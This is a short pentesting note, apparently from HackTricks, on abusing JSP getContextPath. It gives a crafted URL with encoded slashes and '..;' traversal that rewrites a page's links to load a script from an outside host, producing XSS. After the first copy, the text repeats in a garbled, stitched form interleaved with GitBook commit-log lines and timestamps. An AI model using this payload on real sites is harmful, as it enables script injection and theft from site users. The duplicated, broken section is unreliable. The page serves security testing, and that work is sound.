hacktricks/pentesting/pentesting-web/jsp.md

# JSP

##  **getContextPath** abuse

Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).

```
 http://127.0.0.1:8080/&sol;rakeshmane.com/xss.js&num;/..;/..;/contextPathExample/test.jsp
```

Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:

![](<../../.gitbook/assets/image (260).png>)

\
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`# JSP`

			`## getContextPath abuse`

			`Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).`

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`http://127.0.0.1:8080//rakeshmane.com/xss.js&num;/..;/..;/contextPathExample/test.jsp`
			```

			`Accessing that web you may change all the links to request the information to _rakeshmane.com_:`

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`![](<../../.gitbook/assets/image (260).png>)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`\`